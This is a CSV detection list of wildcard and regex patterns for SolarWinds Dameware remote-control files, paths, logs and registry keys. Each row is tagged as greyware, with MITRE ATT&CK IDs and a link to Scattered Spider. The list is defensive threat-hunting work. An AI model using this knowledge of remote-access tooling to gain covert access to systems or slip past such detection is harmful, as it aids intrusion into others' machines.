
"*/DWRCCMD.exe*",".{0,1000}\/DWRCCMD\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*/DWRCS.exe*",".{0,1000}\/DWRCS\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*/SolarWinds-Dameware-DRS-St.exe*",".{0,1000}\/SolarWinds\-Dameware\-DRS\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*/tkc_agent_dre.deb*",".{0,1000}\/tkc_agent_dre\.deb.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\appdata\local\damewa~1\*",".{0,1000}\\appdata\\local\\damewa\~1\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\appdata\local\dameware remote everywhere*",".{0,1000}\\appdata\\local\\dameware\sremote\severywhere.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\appdata\local\microsoft\windows\inetcache\ie\can_install_pc[1].xml*",".{0,1000}\\appdata\\local\\microsoft\\windows\\inetcache\\ie\\can_install_pc\[1\]\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\DameWare Development\*",".{0,1000}\\AppData\\Roaming\\DameWare\sDevelopment\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\baconsoleapp.exe*",".{0,1000}\\baconsoleapp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\baconsoleappen.dll*",".{0,1000}\\baconsoleappen\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\baseclient.exe* -consoleinstallcomplete*",".{0,1000}\\baseclient\.exe.{0,1000}\s\-consoleinstallcomplete.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupclphlp.exe*",".{0,1000}\\basupclphlp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupclpprg.exe*",".{0,1000}\\basupclpprg\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupconhelper.exe*",".{0,1000}\\basupconhelper\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basuplib.dll*",".{0,1000}\\basuplib\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupportexpresssrvcupdater_dameware*",".{0,1000}\\basupportexpresssrvcupdater_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupportexpressstandaloneservice_dameware*",".{0,1000}\\basupportexpressstandaloneservice_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind 
Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupregedithlpr.exe*",".{0,1000}\\basupregedithlpr\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupregedithlpr_*.log*",".{0,1000}\\basupregedithlpr_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvc.cfg*",".{0,1000}\\basupsrvc\.cfg.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvc.exe*",".{0,1000}\\basupsrvc\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvc.ico*",".{0,1000}\\basupsrvc\.ico.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\basupsrvc.ini*",".{0,1000}\\basupsrvc\.ini.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvc.xml*",".{0,1000}\\basupsrvc\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvc_*.log*",".{0,1000}\\basupsrvc_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfg.exe*",".{0,1000}\\basupsrvccnfg\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfg_*.log*",".{0,1000}\\basupsrvccnfg_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfg_dameware*",".{0,1000}\\basupsrvccnfg_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfgde.dll*",".{0,1000}\\basupsrvccnfgde\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfgen.dll*",".{0,1000}\\basupsrvccnfgen\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfges.dll*",".{0,1000}\\basupsrvccnfges\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfgfr.dll*",".{0,1000}\\basupsrvccnfgfr\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfgit.dll*",".{0,1000}\\basupsrvccnfgit\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvccnfgpt.dll*",".{0,1000}\\basupsrvccnfgpt\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 
- T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcde.dll*",".{0,1000}\\basupsrvcde\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcen.dll*",".{0,1000}\\basupsrvcen\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvces.dll*",".{0,1000}\\basupsrvces\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcevnt3.dll*",".{0,1000}\\basupsrvcevnt3\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcfr.dll*",".{0,1000}\\basupsrvcfr\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcit.dll*",".{0,1000}\\basupsrvcit\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control 
utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcpt.dll*",".{0,1000}\\basupsrvcpt\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcupdater.exe*",".{0,1000}\\basupsrvcupdater\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsrvcupdater_*.log*",".{0,1000}\\basupsrvcupdater_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsysinf*.log*",".{0,1000}\\basupsysinf.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsysinf.exe*",".{0,1000}\\basupsysinf\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\basupsysinf.ini*",".{0,1000}\\basupsysinf\.ini.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsysshell.exe*",".{0,1000}\\basupsysshell\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupsysshell64.exe*",".{0,1000}\\basupsysshell64\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basuptshelper.exe*",".{0,1000}\\basuptshelper\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basuptshelper_*.log*",".{0,1000}\\basuptshelper_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basuptshelperlib.dll*",".{0,1000}\\basuptshelperlib\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupunelev.exe*",".{0,1000}\\basupunelev\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\basupvista.dll*",".{0,1000}\\basupvista\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\bavideochat.exe*",".{0,1000}\\bavideochat\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\bawhook.dll*",".{0,1000}\\bawhook\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\beanywhere support express service - [dameware]*",".{0,1000}\\beanywhere\ssupport\sexpress\sservice\s\-\s\[dameware\].{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\currentversion\uninstall\dameware remote 
everywhere*",".{0,1000}\\currentversion\\uninstall\\dameware\sremote\severywhere.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\DameWare Development\MrcVerbLog*",".{0,1000}\\DameWare\sDevelopment\\MrcVerbLog.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\Dameware Mini Remote Control x64\*",".{0,1000}\\Dameware\sMini\sRemote\sControl\sx64\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\dameware mini remote control x64\*",".{0,1000}\\dameware\smini\sremote\scontrol\sx64\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DameWare Mini Remote Control*.exe*",".{0,1000}\\DameWare\sMini\sRemote\sControl.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\Dameware Mini Remote 
Control.lnk*",".{0,1000}\\Dameware\sMini\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\dameware remote everywhere agent*",".{0,1000}\\dameware\sremote\severywhere\sagent.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\dameware remote everywhere.lnk*",".{0,1000}\\dameware\sremote\severywhere\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Dameware Remote Support .lnk*",".{0,1000}\\Dameware\sRemote\sSupport\s\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\Dameware Remote Support\*",".{0,1000}\\Dameware\sRemote\sSupport\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\DameWare.Diagnostics*",".{0,1000}\\DameWare\.Diagnostics.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini 
Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DameWare.LogAdjuster.exe*",".{0,1000}\\DameWare\.LogAdjuster\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DameWare.LogAdjuster.exe.config*",".{0,1000}\\DameWare\.LogAdjuster\.exe\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\damewareagent.exe",".{0,1000}\\damewareagent\.exe","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\damewareagent.exe*",".{0,1000}\\damewareagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\damewareremoteeverywhere\*",".{0,1000}\\damewareremoteeverywhere\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\damewareremoteeverywhereagentinstaller.install.log*",".{0,1000}\\damewareremoteeverywhereagentinstaller\.install\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\disable dameware remote everywhere agent.lnk*",".{0,1000}\\disable\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\DMRC-10-Evaluation.lic*",".{0,1000}\\DMRC\-10\-Evaluation\.lic.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DNTU.exe*",".{0,1000}\\DNTU\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\dre_mac_console.zip*",".{0,1000}\\dre_mac_console\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\DWAMTD.dll*",".{0,1000}\\DWAMTD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWAMTDRES.dll*",".{0,1000}\\DWAMTDRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\DWMRC_St_64.msi*",".{0,1000}\\DWMRC_St_64\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 